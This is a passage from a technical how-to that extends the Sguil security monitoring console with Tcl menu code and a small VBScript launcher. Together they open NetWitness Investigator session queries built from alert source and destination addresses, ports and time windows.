exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=TCP+%7C%7C+$srcIP%3A$srcPort+-%3E+$dstIP%3A$dstPort&time=$past+to+$future&view=session&where=ip.src%3D$srcIP+%26%26+tcp.srcport%3D$srcPort+%26%26+ip.dst%3D$dstIP+%26%26+tcp.dstport%3D$dstPort"
}
if { $direction == "to" } {
exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=TCP+%7C%7C+$dstIP%3A$dstPort+-%3E+$srcIP%3A$srcPort&time=$past+to+$future&view=session&where=ip.src%3D$dstIP+%26%26+tcp.srcport%3D$dstPort+%26%26+ip.dst%3D$srcIP+%26%26+tcp.dstport%3D$srcPort"
}
}
if { $proto == "17" } {
if { $direction == "from" } {
exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=UDP+%7C%7C+$srcIP%3A$srcPort+-%3E+$dstIP+%3A+$dstPort&time=$past+to+$future&view=session&where=ip.src%3D$srcIP+%26%26+udp.srcport%3D$srcPort+%26%26+ip.dst%3D$dstIP+%26%26+udp.dstport%3D$dstPort"
}
if { $direction == "to" } {
exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=UDP+%7C%7C+$dstIP%3A$dstPort+-%3E+$srcIP+%3A+$srcPort&time=$past+to+$future&view=session&where=ip.src%3D$dstIP+%26%26+udp.srcport%3D$dstPort+%26%26+ip.dst%3D$srcIP+%26%26+udp.dstport%3D$srcPort"
}
}
if { $proto == "1" } {
if { $direction == "from" } {
exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ICMP+%7C%7C+$srcIP+-%3E+$dstIP&time=$past+to+$future&view=session&where=ip.src%3D$srcIP+%26%26+ip.dst%3D$dstIP+%26%26+ip.proto%3D1"
}
if { $direction == "to" } {
exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ICMP+%7C%7C+$dstIP+-%3E+$srcIP&time=$past+to+$future&view=session&where=ip.src%3D$dstIP+%26%26+ip.dst%3D$srcIP+%26%26+ip.proto%3D1"
}
}
}
This function will create different queries based upon protocol type (TCP/UDP/ICMP only currently) and use the source/destination address and source/destination port. It will look for sessions that match those specific values and then automatically open them in NetWitness Investigator:
To replicate the SANCP session type queries, we again modify sguil.tk but this time we modify the IPQuery Menu section:
# IPQuery Menu
set ipQueryMenu [ menu .ipQueryMenu -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND \
-activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND -tearoff 0 ]
.ipQueryMenu add cascade -label "Quick Query" -menu $ipQueryMenu.quickMenu
.ipQueryMenu add cascade -label "Advanced Query" -menu $ipQueryMenu.advancedMenu
.ipQueryMenu add cascade -label "Dshield IP Lookup" -menu $ipQueryMenu.dshieldIPMenu
.ipQueryMenu add cascade -label "Nessus Report Lookup" -menu $ipQueryMenu.nessusMenu
.ipQueryMenu add cascade -label "NetWitness Query" -menu $ipQueryMenu.netwitnessMenu
menu $ipQueryMenu.quickMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.advancedMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.dshieldIPMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.nessusMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.netwitnessMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
$ipQueryMenu.netwitnessMenu add command -label "SrcIP/1 Hour" -command "NetWitness Src 1"
$ipQueryMenu.netwitnessMenu add command -label "SrcIP(as Dst)/1 Hour" -command "NetWitness SrcAsDst 1"
$ipQueryMenu.netwitnessMenu add command -label "SrcIP/24 Hours" -command "NetWitness Src 24"
$ipQueryMenu.netwitnessMenu add command -label "SrcIP(as Dst)/24 Hours" -command "NetWitness SrcAsDst 24"
$ipQueryMenu.netwitnessMenu add command -label "DstIP/1 Hour" -command "NetWitness Dst 1"
$ipQueryMenu.netwitnessMenu add command -label "DstIP(as Src)/1 Hour" -command "NetWitness DstAsSrc 1"
$ipQueryMenu.netwitnessMenu add command -label "DstIP/24 Hours" -command "NetWitness Dst 24"
$ipQueryMenu.netwitnessMenu add command -label "DstIP(as Src)/24 Hours" -command "NetWitness DstAsSrc 24"
$ipQueryMenu.netwitnessMenu add command -label "Src To Dst/1 Hour" -command "NetWitness SrcToDst 1"
$ipQueryMenu.netwitnessMenu add command -label "Dst To Src/1 Hour" -command "NetWitness DstToSrc 1"
$ipQueryMenu.netwitnessMenu add command -label "Src To Dst/24 Hours" -command "NetWitness SrcToDst 24"
$ipQueryMenu.netwitnessMenu add command -label "Dst To Src/24 Hours" -command "NetWitness DstToSrc 24"
$ipQueryMenu.netwitnessMenu add command -label "Src To Dst/5 Days" -command "NetWitness SrcToDst 120"
$ipQueryMenu.netwitnessMenu add command -label "Dst To Src/5 Days" -command "NetWitness DstToSrc 120"
foreach { currentMenu subcommand } { .ipQueryMenu.quickMenu "quick" .ipQueryMenu.advancedMenu "build" } {
....truncated for brevity, everything below is should be as it was when you checked it out of CVS...
You can see we are calling a proc/function called NetWitness and are passing it a variable for which address(es) we are interested in (and if they are source or destination addresses) along with some predefined time periods. You have much better flexibility and control if you actually create these queries within NetWitness directly, but just being able to right click makes for greater ease of use for analysts. This is calling the NetWitnessEvent function that we have added to lib/extdata.tcl:
proc NetWitness { direction hours } {
global ACTIVE_EVENT SERVERHOST XSCRIPT_SERVER_PORT DEBUG CUR_SEL_PANE XSCRIPTDATARCVD
global socketWinName SESSION_STATE WIRESHARK_STORE_DIR WIRESHARK_PATH
if {!$ACTIVE_EVENT} {return}
set selectedIndex [$CUR_SEL_PANE(name) curselection]
set sidcidList [split [$CUR_SEL_PANE(name) getcells $selectedIndex,alertID] .]
set cnxID [lindex $sidcidList 1]
set sensorID [lindex $sidcidList 0]
set proto [$CUR_SEL_PANE(name) getcells $selectedIndex,ipproto]
set srcIP [$CUR_SEL_PANE(name) getcells $selectedIndex,srcip]
set srcPort [$CUR_SEL_PANE(name) getcells $selectedIndex,srcport]
set dstIP [$CUR_SEL_PANE(name) getcells $selectedIndex,dstip]
set dstPort [$CUR_SEL_PANE(name) getcells $selectedIndex,dstport]
if { $CUR_SEL_PANE(format) == "SSN" } {
set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,starttime]
} else {
set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,date]
}
if {$hours == 1} {
set future [clock scan "30 minute" -base [clock scan $timestamp -gmt 1]]
set past [clock scan "-30 minute" -base [clock scan $timestamp -gmt 1]]
} else {
set hours [expr $hours / 2]
set future [clock scan "$hours hour" -base [clock scan $timestamp -gmt 1]]
set past [clock scan "-$hours hour" -base [clock scan $timestamp -gmt 1]]
}
set future [clock format $future -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
set past [clock format $past -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
set future [regsub -all -expanded {[\:]} $future {%3A}]
set past [regsub -all -expanded {[\:]} $past {%3A}]
if { $direction == "Src" } {
exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.src%3D$srcIP&time=$past+to+$future&where=ip.src%3D$srcIP"
}
if { $direction == "SrcAsDst" } {
exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.dst%3D$srcIP&time=$past+to+$future&where=ip.dst%3D$srcIP"
}
if { $direction == "Dst" } {
exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.dst%3D$dstIP&time=$past+to+$future&where=ip.dst%3D$dstIP"
}
if { $direction == "DstAsSrc" } {
exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.src%3D$dstIP&time=$past+to+$future&where=ip.src%3D$dstIP"
}
if { $direction == "SrcToDst" } {
exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=$srcIP+-%3E+$dstIP&time=$past+to+$future&where=ip.src%3D$srcIP+%26%26+ip.dst%3D$dstIP"
}
if { $direction == "DstToSrc" } {
exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=$dstIP+-%3E+$srcIP&time=$past+to+$future&where=ip.src%3D$dstIP+%26%26+ip.dst%3D$srcIP"
}
}
Now we can right click on IP’s within Sguil and use the alert data to perform these SANCP queries into NetWitness as shown below:
You may have noticed that the nw://<url>’s are being passed to a visual basic script entitled nw.vbs within the analyst accounts home directory. We had some issues with executing long length commands from within TCL and ran into 8.3 filename limitations as well. The vbscript is very simple and uses the run method to execute explorer.exe while passing it the URL we have formed to perform the query in NetWitness Investigator. If NetWitness Investigator is not running, it will open up and prompt you for your authentication credentials. Additionally, if is already open it will just create a tab in the investigator and display you the sessions/reports. The contents of the nw.vbs file are as follows, it may look weird butyou have to escape quotes with quotes when you do vb scripting so it looks like you have gone quote crazy:
Set objShell = Wscript.CreateObject("Wscript.Shell")
Set ArgObj = WScript.Arguments
Cmd = """" & "c:\windows\system32\explorer.exe" & """" & " " & """" & WScript.Arguments.Item(0) & """"
objShell.Run Cmd
|
|
